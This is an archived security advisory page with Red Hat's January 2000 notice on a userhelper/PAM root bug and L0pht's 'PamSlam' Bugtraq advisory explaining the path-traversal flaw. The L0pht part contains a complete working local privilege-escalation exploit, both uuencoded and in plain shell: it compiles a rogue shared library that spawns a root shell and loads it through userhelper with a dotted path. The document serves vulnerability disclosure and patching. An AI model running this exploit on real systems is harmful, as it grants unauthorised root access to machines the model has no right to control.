[ http://www.rootshell.com/ ]
Date: Tue, 04 Jan 2000 11:58:23 -0500
From: Michael K. Johnson <johnsonm@redhat.com>
---------------------------------------------------------------------
Red Hat, Inc. Security Advisory
Synopsis: New version of usermode fixes security bug
Advisory ID: RHSA-2000:001-01
Issue date: 2000-01-04
Updated on: 2000-01-04
Keywords: root userhelper pam
Cross references:
---------------------------------------------------------------------
1. Topic:
A security bug has been discovered and fixed in the userhelper program.
2. Relevant releases/architectures:
Red Hat Linux 6.0 and 6.1, all architectures.
3. Problem description:
A security bug was found in userhelper; the bug can be exploited to
provide local users with root access.
The bug has been fixed in userhelper-1.17, and pam-0.68-10 has been
modified to help prevent similar attacks on other software in the future.
4. Solution:
For each RPM for your particular architecture, run:
rpm -Uvh <filename>
where filename is the name of the RPM.
5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla/ for more info):
6. Obsoleted by:
7. Conflicts with:
8. RPMs required:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
9. Verification:
MD5 sum Package Name
--------------------------------------------------------------------------
bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm
2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm
fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm
83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm
350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm
d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm
f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm
1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm
These packages are GPG signed by Red Hat, Inc. for security. Our key
is available at:
http://www.redhat.com/corp/contact.html
You can verify each package with the following command:
rpm --checksig <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nogpg <filename>
10. References:
Thanks to dildog@l0pht.com for finding this bug.
--------------------------------------------------------------------------
From dildog@L0PHT.COM Tue Jan 4 21:25:18 2000
Date: Tue, 4 Jan 2000 20:09:05 -0500
From: Dildog <dildog@L0PHT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper
L0pht Security Advisory
Advisory Name: PamSlam
Advisory Released: [01/04/00]
Application: userhelper and PAM on Redhat Linux 6.0/6.1
Severity: A local user can gain root access.
Status: Vendor contacted. Fix provided by vendor.
Advisory released.
Author: dildog@l0pht.com
WWW: http://www.l0pht.com/advisories.html
Overview:
Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.
Description:
The combination of the fact that both userhelper and PAM follow ..
paths allows us to craft up a file that causes userhelper (by way of PAM) to
dlopen any shared object we want as root. The exploit is simple, and utilizes
the '-w' option of userhelper, which lets us specify a program to run with the
privileges designated by PAM. This tries to only execute programs that have
entries in /etc/security/console.apps, but since we get to specify the name,
something like ../../../tmp/myprog gets us a file open path that looks like
/etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to
keep a filename below a directory!
After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue
pam.d configuration file in /tmp/myprog, then it can be pointed to
/etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick
a few shared libraries to dlopen, so at this point, we get root.
The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.
Quick solution:
Download the fix from RedHat at:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
Exploit:
Uudecode the following script. Run the script.
begin 755 pamslam.sh
M(R$O8FEN+W-H"B,*(R!P86US;&%M("T@=G5L;F5R86)I;&ET>2!I;B!2961H
M870@3&EN=7@@-BXQ(&%N9"!004T@<&%M7W-T87)T"B,@9F]U;F0@8GD@9&EL
M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`@("!B;W1H("=P86TG
M(&%N9"`G=7-E<FAE;'!E<B<@*&$@<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S
M('=I=&@@=&AE"B,@("`@)W5S97)M;V1E+3$N,34G(')P;2D@9F]L;&]W("XN
M('!A=&AS+B!3:6YC92!P86U?<W1A<G0@8V%L;',@9&]W;B!T;PHC("`@(%]P
M86U?861D7VAA;F1L97(H*2P@=V4@8V%N(&=E="!I="!T;R!D;&]P96X@86YY
M(&9I;&4@;VX@9&ES:RX@)W5S97)H96QP97(G"B,@("`@8F5I;F<@<V5T=6ED
M(&UE86YS('=E(&-A;B!G970@<F]O="X@"B,*(R!F:7@Z(`HC("`@($YO(&9U
M8VMI;B!I9&5A(&9O<B!A(&=O;V0@9FEX+B!'970@<FED(&]F('1H92`N+B!P
M871H<R!I;B!U<V5R:&5L<&5R(`HC("`@(&9O<B!A('%U:6-K(&9I>"X@4F5M
M96UB97(@)W-T<F-A="<@:7-N)W0@82!V97)Y(&=O;V0@=V%Y(&]F(&-O;F9I
M;FEN9PHC("`@(&$@<&%T:"!T;R!A('!A<G1I8W5L87(@<W5B9&ER96-T;W)Y
M+@HC"B,@<')O<',@=&\@;7D@;6]M;7D@86YD(&1A9&1Y+"!C=7H@=&AE>2!M
M861E(&UE(&1R:6YK(&UY(&UI;&LN"@IC870@/B!?<&%M<VQA;2YC(#P\($5/
M1@HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F@^"B-I;F-L
M=61E/'-Y<R]T>7!E<RYH/@IV;VED(%]I;FET*'9O:60I"GL*("`@('-E='5I
M9"AG971E=6ED*"DI.PH@("`@<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"@IE
M8VAO("UN("X*"F5C:&\@+64@875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M
M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0@-S4U(%]P86US;&%M+F-O
M;F8*"F5C:&\@+6X@+@H*9V-C("UF4$E#("UO(%]P86US;&%M+F\@+6,@7W!A
M;7-L86TN8PH*96-H;R`M;B!O"@IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O
M(%]P86US;&%M+F\*"F5C:&\@+6X@;PH*8VAM;V0@-S4U(%]P86US;&%M+G-O
M"@IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT@7W!A;7-L86TN;PH*96-H
M;R!/"@HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A
M;7-L86TN8V]N9@H*<VQE97`@,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US
*;&%M+F-O;F8*"@``
`
end
Boing.
dildog@l0pht.com
[ For more advisories check out http://www.l0pht.com/advisories.html ]
--------------------------------------------------------------------------
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
